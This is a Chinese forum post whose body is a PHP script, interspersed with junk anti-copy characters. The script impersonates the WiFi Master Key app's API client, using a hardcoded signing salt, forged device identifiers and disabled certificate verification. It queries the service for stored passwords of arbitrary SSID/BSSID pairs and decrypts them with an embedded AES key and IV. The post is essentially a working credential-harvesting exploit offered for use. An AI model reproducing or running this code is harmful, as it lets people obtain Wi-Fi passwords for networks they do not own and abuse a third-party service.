上尉
- 注册时间
- 2010-7-6
- 金币
- 1189 个
- 威望
- 18 个
- 荣誉
- 0 个
尚未签到
|
<form action="" method="post">
0 a9 P4 {3 N/ x" t, j, F+ z; Q <p>ssid: <input type="text" name="ssid" /></p>
h" ]1 E6 {# H/ s; b+ p" `8 {8 E <p>bssid: <input type="text" name="bssid" /></p>7 n# u0 y. e3 L# H2 F) r
<input type="submit" value="提交" />' N% J7 k9 I! u3 `. ~
</form>& |$ O5 C; L1 E* I7 T8 }
! T3 u! ?8 r- t# a8 W3 v<?php5 B* k3 i( H. L! ]: `- r/ `" Z
$bssid = $_POST["bssid"] ;
" }- r$ _3 [7 e7 h. b$ssid = $_POST["ssid"] ;
; A, h3 y9 w& S' h# Q. E, Uif (isset( $bssid ) && isset( $ssid )){8 B; Q' @. n3 }& \- s
//update salt3 {, m* w% A5 A4 w$ z- I- s
$ret = request( $bssid , $ssid , md5(rand(1, 10000)));9 Q' Y* j6 X3 C, \
$ret = json_decode( $ret );( k. `4 w* T& {8 Y
$ret = request( $bssid , $ssid , $ret ->retSn);
5 C. k! u3 j+ R $ret = json_decode( $ret );
! t( h! d! B4 T3 J if ( $ret ->retCd == 0){. X( Z' j% r: M1 P Z* V
if ( $ret ->qryapwd->retCd == 0){0 q% ~+ W s! _6 M( }1 `9 o
$list = $ret ->qryapwd->psws;( ?) {6 g' ?: g7 Y5 M3 T6 t0 `: ]
foreach ( $list as $wifi ){4 t+ e: N2 n% O2 k; B2 W
echo 'SSID: ' . $wifi ->ssid. "<br>" ;
8 t `- P- Y$ h1 ^. o! u echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;
+ I5 @8 o3 \( K* W1 n echo 'BSSID: ' . $wifi ->bssid. "<br>" ;% V* G( Z) @ S- M* D
if ( $wifi ->xUser){
8 s+ C) A e; [5 u! C+ W% R echo 'xUser: ' . $wifi ->xUser. "<br>" ;
% @# @7 a4 x! A7 c, S2 ]5 C7 i echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;( a1 K! F" D1 X7 l
}
* e. K! V- x/ L }
+ s' r7 x9 C9 c* L! s7 v }. O9 a; A5 n' {5 F# s
else {' A9 k6 a; R4 D6 E! t
echo $ret ->qryapwd->retMsg;# A$ n3 |4 N9 N
}* [% h. f6 \5 E# N2 Y3 w
}% Z( Z7 }( F: X) s+ U9 B" R5 q
}$ r, [9 Z9 f& m4 Z' @0 h
function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){
2 E |' Z% G& D# @: o# e* y $data = array ();4 H/ Z0 D, q o2 i/ I9 S' C+ b3 l
$data [ 'appid' ] = '0008' ;+ h' z7 }+ M9 _3 s) v, }4 a9 a }
$data [ 'bssid' ] = $bssid ;
% T: v# v8 {0 u( z' C. N: x# g $data [ 'chanid' ] = 'gw' ;
. O& d; s1 A/ B2 Z( v" R1 ^ $data [ 'dhid' ] = $dhid ;
3 l& j! M8 ]# f% s $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;
( \ U3 z: _3 x! O" e7 G3 k $data [ 'lang' ] = 'cn' ;& X1 E. q1 f4 @+ r- [
$data [ 'mac' ] = '60f81dad28dh' ;3 u, L0 j( f2 o8 [
$data [ 'method' ] = 'getDeepSecChkSwitch' ;
" X8 v3 X' m/ l. n0 \ $data [ 'pid' ] = 'qryapwd:commonswitch' ;& \& q4 Y. d2 b3 ~& S9 W b9 Y
$data [ 'ssid' ] = $ssid ;9 {, r( h4 m8 [$ v3 g8 |9 c
$data [ 'st' ] = 'm' ;/ |0 f) @* d) R+ j1 z0 i5 w9 U
$data [ 'uhid' ] = 'a0000000000000000000000000000002' ;5 p _6 ?" Q" r3 z" ^6 y$ X
$data [ 'v' ] = '324' ;$ `& w" ~5 p" \2 _
$data [ 'sign' ] = sign( $data , $salt );
. K7 J Z0 H# t! { $curl = curl_init();
; m7 s& H' W" R% Y( h! ] curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );
3 B- q* y8 |6 u/ P. l$ t4 I3 u curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );* u! c; o1 ]3 [$ ?" n" P6 F
curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
) s1 i2 f/ ?: ~. k" X4 D, L# s curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);
) q7 s; z& f' I! R( ~4 C. ~ curl_setopt( $curl , CURLOPT_POST, true); // enable posting
) G* I% G4 d$ q0 q curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images: X- t) \ `) ]4 N" ?
curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload
! i" `% l8 ^. @9 R& X4 o% ^$ V $r = curl_exec( $curl );' t2 }5 u6 o. T! v/ r% [
curl_close( $curl );6 M% j/ Y4 Z) f, o- Z3 C, _6 ~
return $r ;
5 W$ X. ~0 u/ @# Y: Q0 o}
/ J; ]8 q8 C$ x/ Ifunction registerNewDevice(){7 Z& F# ^5 M8 d
$salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;0 z" e* a' ^! x S
$data = array (); L. N+ t& b, x, H0 Q
$data [ 'appid' ] = '0008' ;( d B- g" y- J6 v" G
$data [ 'bssid' ] = $bssid ;
" F6 n9 W& |0 b+ `! t: c, B4 e $data [ 'chanid' ] = 'gw' ;
7 z e& v c# }8 _& {- ] $data [ 'dhid' ] = $dhid ;
% k; b% ~% c! v" { $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;
( O$ |) |' v7 n3 Q $data [ 'lang' ] = 'cn' ;
6 E5 M2 P' q( e4 [ $data [ 'mac' ] = '60f81dad28de' ;
- p# s% [" v$ x1 ~" J $data [ 'method' ] = 'getDeepSecChkSwitch' ;( S; C! `) O) H' Q" D8 { @, f4 y
$data [ 'pid' ] = 'qryapwd:commonswitch' ;
0 ^" Q: Y. b L4 O! ]: \9 V $data [ 'ssid' ] = $ssid ;/ j1 w* i9 i2 f% k# f! w
$data [ 'st' ] = 'm' ;/ x9 `# |& ]* }( Y4 `7 e1 O/ M- [4 E
$data [ 'uhid' ] = 'a0000000000000000000000000000001' ;
# Z0 k4 }9 l; E7 W+ I1 p- ] $data [ 'v' ] = '324' ;1 J. n3 V. |1 W1 ^1 g( r
$data [ 'sign' ] = sign( $data , $salt );
j0 w; t8 U( U+ h: E}2 y( I8 w( `! N( {9 ]- ?
function sign( $array , $salt ){
4 u0 G7 a; E$ _ // 签名算法
6 s( K( c3 K4 ^9 V $request_str = '' ;* J6 `* L& u2 m
// 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort
4 W6 G; J: F7 a6 I+ A ksort( $array );) s. @# R8 T; Q3 x5 S
foreach ( $array as $key => $value ) {
0 Z& b: ?" P7 n$ N+ U' [ $request_str .= $value ;* @# p- m _$ f' _
}
5 t6 E: Z) E h $sign = md5( $request_str . $salt );
% n2 [5 N" b# w9 [, X( U return strtoupper ( $sign );
" ?' u" Y* a: z0 _- m}1 T( T0 P+ u+ t6 a6 O
function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){
1 \' [1 H2 u% r' n( E! E //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密
9 A; E z* m, ` //[length][password][timestamp]: [5 M* }% ~- k3 i6 J: Z6 D8 \* a& ?
$decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );
. G( E' P/ d5 s& \ return substr (trim( $decrypted_string ),3,-13);7 C4 F8 y" ~7 ~2 U) P9 A5 d0 b
} ?> |
评分
-
1
查看全部评分
-
|
[复制链接]
IP卡
狗仔卡
发表于 2016-8-22 03:03
显身卡
